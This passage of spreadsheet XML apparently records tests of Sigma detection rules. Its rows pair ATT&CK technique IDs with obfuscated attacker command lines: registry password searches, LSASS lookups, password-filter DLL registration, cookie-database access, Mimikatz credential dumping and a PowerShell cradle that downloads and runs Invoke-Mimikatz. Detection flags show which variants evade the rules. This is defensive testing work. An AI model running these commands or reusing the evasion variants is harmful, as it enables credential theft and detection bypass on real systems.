      <c r="E1829" s="44" t="inlineStr">
        <is>
          <t>icacls "C:\Program Files\*" 2&gt;nul | findstr "Every.ne"</t>
        </is>
      </c>
      <c r="F1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1829" s="44" t="n"/>
      <c r="J1829" s="44" t="n"/>
      <c r="K1829" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1830" ht="15.75" customHeight="1" s="42">
      <c r="A1830" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1830" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1830" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1830" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E1830" s="44" t="inlineStr">
        <is>
          <t>icacls "C:\Program Files\*" 2&gt;nul | findstr "BUILTIN\\"</t>
        </is>
      </c>
      <c r="F1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1830" s="44" t="n"/>
      <c r="J1830" s="44" t="n"/>
      <c r="K1830" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1831" ht="15.75" customHeight="1" s="42">
      <c r="A1831" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1831" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1831" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1831" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E1831" s="44" t="inlineStr">
        <is>
          <t>icacls	"C:\Program Files\*"	2&gt;nul	|	findstr	"Everyone"</t>
        </is>
      </c>
      <c r="F1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1831" s="44" t="n"/>
      <c r="J1831" s="44" t="n"/>
      <c r="K1831" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1832" ht="15.75" customHeight="1" s="42">
      <c r="A1832" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1832" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C1832" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D1832" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E1832" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-T''ater}"</t>
        </is>
      </c>
      <c r="F1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1832" s="44" t="n"/>
      <c r="J1832" s="44" t="n"/>
      <c r="K1832" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1833" ht="15.75" customHeight="1" s="42">
      <c r="A1833" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1833" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C1833" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D1833" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E1833" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe UWhRCAAAAABAAA""AA</t>
        </is>
      </c>
      <c r="F1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1833" s="44" t="n"/>
      <c r="J1833" s="44" t="n"/>
      <c r="K1833" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1834" ht="15.75" customHeight="1" s="42">
      <c r="A1834" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1834" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C1834" s="44" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D1834" s="44" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E1834" s="44" t="inlineStr">
        <is>
          <t>setspn.exe -T %USERDNSDOMAIN% "-q" */*</t>
        </is>
      </c>
      <c r="F1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1834" s="44" t="n"/>
      <c r="J1834" s="44" t="n"/>
      <c r="K1834" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1835" ht="15.75" customHeight="1" s="42">
      <c r="A1835" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1835" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C1835" s="44" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D1835" s="44" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E1835" s="44" t="inlineStr">
        <is>
          <t>setspn.exe -T %USERDNSDOMAIN% -q	*/*</t>
        </is>
      </c>
      <c r="F1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1835" s="44" t="n"/>
      <c r="J1835" s="44" t="n"/>
      <c r="K1835" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1836" ht="15.75" customHeight="1" s="42">
      <c r="A1836" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1836" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C1836" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D1836" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E1836" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {get-process -name lsass}"</t>
        </is>
      </c>
      <c r="F1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1836" s="44" t="n"/>
      <c r="J1836" s="44" t="n"/>
      <c r="K1836" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1837" ht="15.75" customHeight="1" s="42">
      <c r="A1837" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1837" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C1837" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D1837" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E1837" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {gps -name lsass}"</t>
        </is>
      </c>
      <c r="F1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1837" s="44" t="n"/>
      <c r="J1837" s="44" t="n"/>
      <c r="K1837" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1838" ht="15.75" customHeight="1" s="42">
      <c r="A1838" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1838" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C1838" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D1838" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E1838" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {ps -ProcessName lsass}"</t>
        </is>
      </c>
      <c r="F1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1838" s="44" t="n"/>
      <c r="J1838" s="44" t="n"/>
      <c r="K1838" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1839" ht="15.75" customHeight="1" s="42">
      <c r="A1839" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1839" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C1839" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D1839" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E1839" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {get-process | where {$_.ProcessName -eq 'lsass'}}"</t>
        </is>
      </c>
      <c r="F1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1839" s="44" t="n"/>
      <c r="J1839" s="44" t="n"/>
      <c r="K1839" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1840" ht="15.75" customHeight="1" s="42">
      <c r="A1840" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1840" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C1840" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D1840" s="44" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E1840" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "gci -Path C:\ -Recurse -Filter '*.*ke?'"</t>
        </is>
      </c>
      <c r="F1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1840" s="44" t="n"/>
      <c r="J1840" s="44" t="n"/>
      <c r="K1840" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1841" ht="15.75" customHeight="1" s="42">
      <c r="A1841" s="44" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B1841" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C1841" s="44" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D1841" s="44" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E1841" s="44" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /v NotificationPackages /t reg_multi_sz /d scecli.dll\0\0</t>
        </is>
      </c>
      <c r="F1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1841" s="44" t="n"/>
      <c r="J1841" s="44" t="n"/>
      <c r="K1841" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1842" ht="15.75" customHeight="1" s="42">
      <c r="A1842" s="44" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B1842" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C1842" s="44" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D1842" s="44" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E1842" s="44" t="inlineStr">
        <is>
          <t>reg add HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v NotificationPackages /t reg_multi_sz /d  scecli</t>
        </is>
      </c>
      <c r="F1842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1842" s="44" t="n"/>
      <c r="J1842" s="44" t="n"/>
      <c r="K1842" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1843" ht="15.75" customHeight="1" s="42">
      <c r="A1843" s="44" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B1843" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C1843" s="44" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D1843" s="44" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E1843" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /v NotificationPackages /t reg_multi_sz /d scecli.dll</t>
        </is>
      </c>
      <c r="F1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1843" s="44" t="n"/>
      <c r="J1843" s="44" t="n"/>
      <c r="K1843" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1844" ht="15.75" customHeight="1" s="42">
      <c r="A1844" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1844" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C1844" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D1844" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E1844" s="44" t="inlineStr">
        <is>
          <t>reg query HKCU /f:password /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F1844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1844" s="44" t="n"/>
      <c r="J1844" s="44" t="n"/>
      <c r="K1844" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1845" ht="15.75" customHeight="1" s="42">
      <c r="A1845" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1845" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C1845" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D1845" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E1845" s="44" t="inlineStr">
        <is>
          <t>reg query HKCU\\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1845" s="44" t="n"/>
      <c r="J1845" s="44" t="n"/>
      <c r="K1845" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1846" ht="15.75" customHeight="1" s="42">
      <c r="A1846" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1846" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C1846" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D1846" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E1846" s="44" t="inlineStr">
        <is>
          <t>reg query HKCU /f password /t"REG_SZ" /s</t>
        </is>
      </c>
      <c r="F1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1846" s="44" t="n"/>
      <c r="J1846" s="44" t="n"/>
      <c r="K1846" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1847" ht="15.75" customHeight="1" s="42">
      <c r="A1847" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1847" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C1847" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D1847" s="44" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E1847" s="44" t="inlineStr">
        <is>
          <t>reg query "HKCU\Software\SimonTatham\PuTTY""\Sessions" /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F1847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1847" s="44" t="n"/>
      <c r="J1847" s="44" t="n"/>
      <c r="K1847" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1848" ht="15.75" customHeight="1" s="42">
      <c r="A1848" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1848" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C1848" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D1848" s="44" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E1848" s="44" t="inlineStr">
        <is>
          <t>vaultcmd.exe -listcreds:"Windows Credentials"</t>
        </is>
      </c>
      <c r="F1848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1848" s="44" t="n"/>
      <c r="J1848" s="44" t="n"/>
      <c r="K1848" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1849" ht="15.75" customHeight="1" s="42">
      <c r="A1849" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B1849" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C1849" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D1849" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E1849" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:/Users/thaim/AppData/Local/Google/Chrome/User Data/Default/Network/Cookies"</t>
        </is>
      </c>
      <c r="F1849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1849" s="44" t="n"/>
      <c r="J1849" s="44" t="n"/>
      <c r="K1849" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1850" ht="15.75" customHeight="1" s="42">
      <c r="A1850" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1850" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1850" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1850" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1850" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WinEvent -LogName 'Sec*' -FilterXPath '*[System[(EventID=4624)]]'"</t>
        </is>
      </c>
      <c r="F1850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1850" s="44" t="n"/>
      <c r="J1850" s="44" t="n"/>
      <c r="K1850" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1851" ht="15.75" customHeight="1" s="42">
      <c r="A1851" s="44" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B1851" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C1851" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D1851" s="44" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E1851" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Select-String -Path C:\Users\Public\*.txt -Pattern ('eyJ0e' + 'XAiOi')"</t>
        </is>
      </c>
      <c r="F1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1851" s="44" t="n"/>
      <c r="J1851" s="44" t="n"/>
      <c r="K1851" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1852" ht="15.75" customHeight="1" s="42">
      <c r="A1852" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1852" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C1852" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1852" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E1852" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /v /l "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F1852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1852" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J1852" s="44" t="n"/>
      <c r="K1852" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1853" ht="15.75" customHeight="1" s="42">
      <c r="A1853" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1853" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C1853" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1853" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E1853" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr.exe /v^  /l^  "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F1853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1853" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J1853" s="44" t="n"/>
      <c r="K1853" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1854" ht="15.75" customHeight="1" s="42">
      <c r="A1854" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1854" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C1854" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D1854" s="44" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E1854" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\mimi.exe "sekurlsa""::"logonpasswords exit</t>
        </is>
      </c>
      <c r="F1854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1854" s="44" t="n"/>
      <c r="J1854" s="44" t="n"/>
      <c r="K1854" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1855" ht="15.75" customHeight="1" s="42">
      <c r="A1855" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1855" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C1855" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D1855" s="44" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E1855" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Dump""Creds"</t>
        </is>
      </c>
      <c r="F1855" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1855" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Suspicious PowerShell Download and Execute Pattern (e6c54d94-498c-4562-a37c-b469d8e9a275); Suspicious PowerShell Download and Execute Pattern (e6c54d94-498c-4562-a37c-b469d8e9a275); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); PowerShell Download Pattern (3b6ab547-8ec2-4991-b9d2-2b06702a48d7); Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2); Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets 